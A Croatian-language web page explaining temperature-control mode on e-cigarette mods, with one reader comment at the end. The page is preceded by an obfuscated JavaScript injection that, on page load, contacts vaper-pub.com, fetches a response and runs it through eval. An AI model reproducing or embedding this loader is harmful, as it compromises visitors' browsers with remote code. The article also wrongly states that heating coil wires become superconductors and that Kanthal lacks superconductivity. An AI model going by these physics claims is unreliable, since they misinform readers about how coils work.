;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

KAKO KORISTITI TC MOD (KONTROLU TEMPERATURE)

Kontrola temperature (TC) je način rada kroz koji mod regulira intenzitet kako bi se zavojnica održavala na temperaturi koju definira korisnik. Prema proizvođačima, održavanje konstantne temperature jamstvo je veće sigurnosti, ali se ovaj argument ponekad zloupotrijebi jer se, na primjer, ni na uređajima ni na bocama e tekućine ne navodi nikakva temperatura koju treba koristiti.

Osnovne znanstvene činjenice

Zavojnica je u većini slučajeva otporna žica koja je presavijena u opružni cilindar s kružnim zavojima koji se ne preklapaju. Otpor žice (u Ω.m-1) definira koliko se jako određena žica, općenito legura, suprotstavlja protoku elektrona ili električne struje. Toplina nastaje kada se električna energija raspršuje u žicu kada se elektroni raspršuju od strane atoma prisutnih u leguri, takozvani Jouleov efekt. 

Kada kupite grijač od dobavljača, dolazi s naljepnicom koja pokazuje njegov otpor, vrijednost u Ohmima (Ω). 

Otpor žica mijenja se s temperaturom.

Otpor legure je stabilan blizu sobne temperature i općenito raste s temperaturom kako materijal postaje supravodič. Tada, i tek nakon ovog prijelaza, njegov otpor se može predvidjeti iz njegove temperature. 

Kontrola temperature

Općenito je pravilo da otpor (R) zavojnice raste s temperaturom (T). U načinu kontrole temperature, čipset moda vrlo brzo mjeri otpor pri povećanju razina intenziteta. Čip u osnovi povećava intenzitet struje sve do postizanja određene vrijednosti (R) otpora. Ova zadana vrijednost (R) odgovara željenoj temperaturi (T). 

Međutim, da bi se ta temperatura (T) dobila s više ili manje preciznosti, postupak uvelike ovisi o parametrima kalibracije. 

U postupku kalibracije (obično rad koji se izvodi ručno i koji je manje-više opisan u korisničkom priručniku), uređaj mjeri nazivnu vrijednost otpora (R0) na sobnoj temperaturi (T0) i temperaturni koeficijent odabranog otpora (α). Radi jednostavnosti, proizvođači nude mogućnost odabira α vrste korištene otporne žice: nikal (Ni), titan (Ti) ili nehrđajući čelik (SS). 

U nekim više stručnim načinima, α se može unijeti kao brojčana vrijednost. To omogućuje korištenje vrsta legura koje nisu uobičajene ili prilagođavanje novim otpornim zavojnicama koje dolaze na tržište bez mijenjanja moda. 

Koju žicu koristiti?

Ni, Ti i SS zavojnice su u skladu s kontrolom temperature, ali ne i Kanthal. Razlog zašto Kanthal ne dopušta kontrolu temperature je taj što ova legura FeCrAl ima mnogo više nečistoća od bilo koje druge i ne nudi svojstva supravodljivosti (linearni odnos otpora s temperaturom). Zapravo, elektroni su toliko raspršeni nečistoćama da zagrijavaju leguru dok se otpor održava konstantnim. Posebne vrste Kanthala mogu se koristiti do 1425°C u industriji. 

Je li kontrola temperature potpuno precizna?

Ne. Ali bolje je nego ništa. 

Parametar α se uklapa iz mjernih podataka u definiranom eksperimentalnom okruženju koje ne ispunjava nužno uvjete koji se koriste s e-cigaretom. Dakle, α ovisi o T0. Budući da e cigareta nije opremljena za mjerenje ove temperature, proizvođač postavlja α kao konstantu. Stoga, ako kalibrirate mod na 17°C ili 27°C, točnost T:R odnosa će varirati. Zapamtite da je linearna aproksimacija samo aproksimacija i da je različita za različite referentne temperature T0. 

Takva upozorenja trebala bi pozvati korisnike da budu oprezni pri odabiru radne temperature i da zadrže malo slobode s onim što odaberu kao svoju višu granicu. 

Koju temperaturu odabrati?

Najnižu moguću… Da, ali ovisno o vašem uređaju i tekućini koju koristite, potrebna je minimalna toplina za proizvodnju pare. U mješavinama su prisutne različite tekućine različitih svojstava i vrelišta. 

Voda ključa na 100°C, propilen glikol (PG) isparava na 188°C (ili 371°F), biljni glicerin (VG) na 290°C (ili 554°F) i etanol na 78°C (ili 173° F). 

Prisutni su i drugi sastojci čija koncentracija i sastav također vrlo variraju od jedne e tekućine do druge. 

Najčešći je nikotin čija koncentracija ne može prijeći 2% u Europi, ali s vrijednostima do 4,8% u određenim tekućinama poput onih koji se koriste u Vype ePen, na primjer. Vrelište nikotina postiže se na 247°C (ili 477°F). 

Arome mogu doseći i do 20% volumena konačne mješavine. Diacetil, na primjer, koji daje okus maslaca, vrije na samo 88°C (ili 190°F), za acetoin koji daje isti okus, on je viši (148°C ili 298°F). Za okus banane, izoamil acetat isparava na 142°C (ili 288°F). Benzaldehid (okus trešnje) vrije na 178°C (ili 352°F), a cinamaldehid (okus cimeta) na 248°C (478°F). Voćne arome (etil propionat) na 99°C (ili 210°F), grožđe (metil antranilat) na 256°C (ili 493°F), naranča (limonen) na 176°C (ili 349°F), ananas (alil heksanoat) na 190°C (ili 374°F), šećerna vuna (etil maltol) na 161°C (ili 322°F), mentol na 212°C (ili 414°F) i vanilija (vanilin) ​​na 295 °C (ili 563°F). 

Proizvođači su često u iskušenju da dodaju razne dodatke kako bi bolje razvili određene okuse. Koriste zaslađivače poput šećera među kojima je najčešća saharoza koja se raspada na 186°C (ili 367°F). Glutaminska kiselina je još jedan popularan dodatak (koji se također naziva glutamat) koji se razgrađuje na 199°C (390°F). Reakcija između aminske skupine glutaminske aminokiseline i reducirajućeg šećera dovodi do Maillardove reakcije koja proizvodi široku paletu okusa kada se proizvodi zagrijavaju. 

Stoga je optimalnu temperaturu teško procijeniti zbog raznolikosti reakcija i različitih spojeva koji se sreću. Na temelju čitanja na raznim forumima, korisnici se općenito odlučuju za temperaturnu vrijednost oko 250°C za udisaje kraće od 5 sekundi. Pri nižoj vrijednosti, zavojnica se ne zagrijava homogeno i izazivaju “kuhanje” svoje tekućine kada se na fitilju nakupi prljavština što je općenito povezano s degradiranim okusom. Ponekad je degradacija okusa ekstremna i dovodi do odbojnosti koju stručni korisnici povezuju s proizvodnjom akroleina, molekule koju je poželjno izbjegavati. 

Choose your Reaction!
  • treba nešto više napisati o samoj proceduri postavljanja grijača i moda za TC režim, na čega treba obratiti sve pažnju.

Leave a Comment